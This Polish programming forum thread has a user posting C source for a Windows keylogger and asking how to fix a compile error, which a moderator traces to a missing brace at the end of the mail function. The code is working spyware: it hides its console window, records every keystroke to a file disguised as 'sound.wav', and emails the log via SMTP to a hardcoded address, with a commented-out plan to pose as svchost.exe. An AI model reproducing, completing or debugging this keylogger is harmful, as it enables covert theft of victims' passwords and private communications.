bład w składni " [error] expected "}" at end of input"

Odpowiedz Nowy wątek
Skoczeq
2016-10-20 21:32
Skoczeq
0

Przy kompilacji pojawia sie: (wiersz 340) [error] expected "}" at end of input

Oczekiwałbym aby ktoś poprawił kod i wyjaśnił gdzie był błąd

link do pastebina z numerowaniem wierszy: http://pastebin.com/be2sZvbY

#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>
#include <time.h>
int MailIt(
  char* mailserver, char* emailto, char* emailfrom, char* emailsubject, char* emailmessage);
#define BUFSIZE 800
#define waittime 500
/*SMTP */
#define cmailserver "alt1.gmail-smtp-in.l.google.com"
#define cemailto "[email protected]"
#define cemailfrom "[email protected]"
#define LogLength 100
#define FileName "sound.wav"
#define SMTPLog "ring.wav"
#define cemailsubject "Logged"

int sleep(char);
int get_keys(void);
int test_key(void);
int main(void)
{
  // stealth
  HWND stealth; /*creating stealth */
  AllocConsole();
  stealth = FindWindowA("ConsoleWindowClass", NULL);
  ShowWindow(stealth, 0);

  {
    FILE* file;
    file = fopen(FileName, "a+");
    time_t theTime = time(0);
    fputs("\nStarted logging: ", file);
    fputs(ctime(&theTime), file);
    fclose(file);
  }

  /* if (test==2)
  {//the path in which the file needs to be
  char *path="c:\\%windir%\\svchost.exe";
  create=create_key(path);
  } */

  int t = get_keys();
  return t;
}

int get_keys(void)
{
  int freadindex;
  char* buf;
  long len;
  FILE* file;
  file = fopen(FileName, "a+");

  short character;
  while (1)
  {
    sleep(10); /*to prevent 100% cpu usage*/
    for (character = 8; character <= 222; character++)
    {
      if (GetAsyncKeyState(character) == -32767)
      {
        FILE* file;
        file = fopen(FileName, "a+");
        if (file == NULL)
        {
          return 1;
        }
        if (file != NULL)
        {
          if ((character >= 39) && (character <= 64))
          {
            fputc(character, file);
            fclose(file);
            break;
          }
          else if ((character > 64) && (character < 91))
          {
            character += 32;
            fputc(character, file);
            fclose(file);
            break;
          }
          else
          {
            switch (character)
            {
              case VK_SPACE:
                fputc(' ', file);
                fclose(file);
                break;
              case VK_SHIFT:
                fputs("\r\n[SHIFT]\r\n", file);
                fclose(file);
                break;
              case VK_RETURN:
                fputs("\r\n[ENTER]\r\n", file);
                fclose(file);
                break;
              case VK_BACK:
                fputs("\r\n[BACKSPACE]\r\n", file);
                fclose(file);
                break;
              case VK_TAB:
                fputs("\r\n[TAB]\r\n", file);
                fclose(file);
                break;
              case VK_CONTROL:
                fputs("\r\n[CTRL]\r\n", file);
                fclose(file);
                break;
              case VK_DELETE:
                fputs("\r\n[DEL]\r\n", file);
                fclose(file);
                break;
              case VK_OEM_1:
                fputs("\r\n[;:]\r\n", file);
                fclose(file);
                break;
              case VK_OEM_2:
                fputs("\r\n[/?]\r\n", file);
                fclose(file);
                break;
              case VK_OEM_3:
                fputs("\r\n[`~]\r\n", file);
                fclose(file);
                break;
              case VK_OEM_4:
                fputs("\r\n[ [{ ]\r\n", file);
                fclose(file);
                break;
              case VK_OEM_5:
                fputs("\r\n[\\|]\r\n", file);
                fclose(file);
                break;
              case VK_OEM_6:
                fputs("\r\n[ ]} ]\r\n", file);
                fclose(file);
                break;
              case VK_OEM_7:
                fputs("\r\n['\"]\r\n", file);
                fclose(file);
                break;
              case 187:
                fputc('+', file);
                fclose(file);
                break;
              case 188:
                fputc(',', file);
                fclose(file);
                break;
              case 189:
                fputc('-', file);
                fclose(file);
                break;
              case 190:
                fputc('.', file);
                fclose(file);
                break;
              case VK_NUMPAD0:
                fputc('0', file);
                fclose(file);
                break;
              case VK_NUMPAD1:
                fputc('1', file);
                fclose(file);
                break;
              case VK_NUMPAD2:
                fputc('2', file);
                fclose(file);
                break;
              case VK_NUMPAD3:
                fputc('3', file);
                fclose(file);
                break;
              case VK_NUMPAD4:
                fputc('4', file);
                fclose(file);
                break;
              case VK_NUMPAD5:
                fputc('5', file);
                fclose(file);
                break;
              case VK_NUMPAD6:
                fputc('6', file);
                fclose(file);
                break;
              case VK_NUMPAD7:
                fputc('7', file);
                fclose(file);
                break;
              case VK_NUMPAD8:
                fputc('8', file);
                fclose(file);
                break;
              case VK_NUMPAD9:
                fputc('9', file);
                fclose(file);
                break;
              case VK_CAPITAL:
                fputs("\r\n[CAPS LOCK]\r\n", file);
                fclose(file);
                break;
              default:
                fclose(file);
                break;
            }
          }
        }
      }
    }
    FILE* file;
    file = fopen(FileName, "rb");
    fseek(file, 0, SEEK_END); // go to end
    len = ftell(file); // get position at end (length)
    if (len >= LogLength)
    {
      fseek(file, 0, SEEK_SET); // go to beg.
      buf = (char*)malloc(len); // malloc buffer
      freadindex = fread(buf, 1, len, file); // read into buffer
      buf[freadindex] = '\0'; // Extra bit I have to add to make it a sting
      MailIt(cmailserver, cemailto, cemailfrom, cemailsubject, buf);
      fclose(file);
      file = fopen(FileName, "w");
    }

    fclose(file);
    // free (buf);
  }
  return EXIT_SUCCESS;
}

int MailIt(char* mailserver, char* emailto, char* emailfrom, char* emailsubject, char* emailmessage)
{
  SOCKET sockfd;
  WSADATA wsaData;
  FILE* smtpfile;

#define bufsize 300
  int bytes_sent; /* Sock FD */
  int err;
  struct hostent* host; /* info from gethostbyname */
  struct sockaddr_in dest_addr; /* Host Address */
  char line[1000];
  char* Rec_Buf = (char*)malloc(bufsize + 1);
  smtpfile = fopen(SMTPLog, "a+");

  if (WSAStartup(0x202, &wsaData) == SOCKET_ERROR)
  {
    fputs("WSAStartup failed", smtpfile);
    WSACleanup();
    return -1;
  }
  if ((host = gethostbyname(mailserver)) == NULL)
  {
    perror("gethostbyname");
    exit(1);
  }
  memset(&dest_addr, 0, sizeof(dest_addr));
  memcpy(&(dest_addr.sin_addr), host->h_addr, host->h_length);

  /* Prepare dest_addr */
  dest_addr.sin_family = host->h_addrtype; /* AF_INET from gethostbyname */
  dest_addr.sin_port = htons(25); /* PORT defined above */

  /* Get socket */

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    perror("socket");
    exit(1);
  }
  /* Connect !*/
  fputs("Connecting....\n", smtpfile);

  if (connect(sockfd, (struct sockaddr*)&dest_addr, sizeof(dest_addr)) == -1)
  {
    perror("connect");
    exit(1);
  }

  sleep(waittime);
  err = recv(sockfd, Rec_Buf, bufsize, 0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf, smtpfile);
  strcpy(line, "helo me.somepalace.com\n");
  fputs(line, smtpfile);
  bytes_sent = send(sockfd, line, strlen(line), 0);
  sleep(waittime);
  err = recv(sockfd, Rec_Buf, bufsize, 0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf, smtpfile);
  strcpy(line, "MAIL FROM:<");
  strncat(line, emailfrom, strlen(emailfrom));
  strncat(line, ">\n", 3);
  fputs(line, smtpfile);
  bytes_sent = send(sockfd, line, strlen(line), 0);
  sleep(waittime);
  err = recv(sockfd, Rec_Buf, bufsize, 0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf, smtpfile);
  strcpy(line, "RCPT TO:<");
  strncat(line, emailto, strlen(emailto));
  strncat(line, ">\n", 3);
  fputs(line, smtpfile);
  bytes_sent = send(sockfd, line, strlen(line), 0);
  sleep(waittime);
  err = recv(sockfd, Rec_Buf, bufsize, 0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf, smtpfile);
  strcpy(line, "DATA\n");
  fputs(line, smtpfile);
  bytes_sent = send(sockfd, line, strlen(line), 0);
  sleep(waittime);
  err = recv(sockfd, Rec_Buf, bufsize, 0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf, smtpfile);
  sleep(waittime);
  strcpy(line, "To:");
  strcat(line, emailto);
  strcat(line, "\n");
  strcat(line, "From:");
  strcat(line, emailfrom);
  strcat(line, "\n");
  strcat(line, "Subject:");
  strcat(line, emailsubject);
  strcat(line, "\n");
  strcat(line, emailmessage);
  strcat(line, "\r\n.\r\n");
  fputs(line, smtpfile);
  bytes_sent = send(sockfd, line, strlen(line), 0);
  sleep(waittime);
  err = recv(sockfd, Rec_Buf, bufsize, 0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf, smtpfile);
  strcpy(line, "quit\n");
  fputs(line, smtpfile);
  bytes_sent = send(sockfd, line, strlen(line), 0);
  sleep(waittime);
  err = recv(sockfd, Rec_Buf, bufsize, 0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf, smtpfile);
  fclose(smtpfile);
#ifdef WIN32
  closesocket(sockfd);
  WSACleanup();
#else
  close(sockfd);
#endif
edytowany 1x, ostatnio: kq, 2016-12-13 18:26

Pozostało 580 znaków

kq
2016-10-20 21:34
kq
Moderator C/C++

Rejestracja: 6 lat temu

Ostatnio: 10 sekund temu

Lokalizacja: Szczecin

0

Wskaż proszę klamrę kończącą funkcję MailIt.


Pozostało 580 znaków

Skoczeq
2016-10-20 21:47
Skoczeq
0

Kurde nie wiem nie ma xD?

Pozostało 580 znaków

kq
2016-10-20 21:48
kq
Moderator C/C++

Rejestracja: 6 lat temu

Ostatnio: 10 sekund temu

Lokalizacja: Szczecin

2

Ok, a teraz przytoczmy błąd zgłaszany przez kompilator:

expected "}" at end of input


Pozostało 580 znaków

Skoczeq
2016-10-20 21:52
Skoczeq
0

tylko z tym ze error odnosi sie do WSACleanup

Pozostało 580 znaków

kq
2016-10-20 21:55
kq
Moderator C/C++

Rejestracja: 6 lat temu

Ostatnio: 10 sekund temu

Lokalizacja: Szczecin

0

A nie do 340. linii z 340 linii kodu, który wkleiłeś?


edytowany 1x, ostatnio: kq, 2016-10-20 21:55

Pozostało 580 znaków

Skoczeq
2016-10-20 21:59
Skoczeq
0

przepraszam moj blad 341* wiersza

Pozostało 580 znaków

Skoczeq
2016-10-20 22:18
Skoczeq
0

tak to teraz wyglada:
https://zapodaj.net/ee2b520a1fbab.png.html

Pozostało 580 znaków

kq
2016-10-20 22:20
kq
Moderator C/C++

Rejestracja: 6 lat temu

Ostatnio: 10 sekund temu

Lokalizacja: Szczecin

0
 1. Dlaczego nikt nie odpowiada w moim wątku? podpunkt o wklejaniu obrazków kodu
 2. W jakiej funkcji są wywoływane funkcje closesocket i WSACleanup?

Pozostało 580 znaków

Skoczeq
2016-10-20 22:26
Skoczeq
0

w MailIt

Pozostało 580 znaków

kq
2016-10-20 22:27
kq
Moderator C/C++

Rejestracja: 6 lat temu

Ostatnio: 10 sekund temu

Lokalizacja: Szczecin

0

Ale przecież zakończyłeś ją linijkę wyżej :​)


edytowany 1x, ostatnio: kq, 2016-10-20 22:27

Pozostało 580 znaków

Odpowiedz

1 użytkowników online, w tym zalogowanych: 0, gości: 1, botów: 0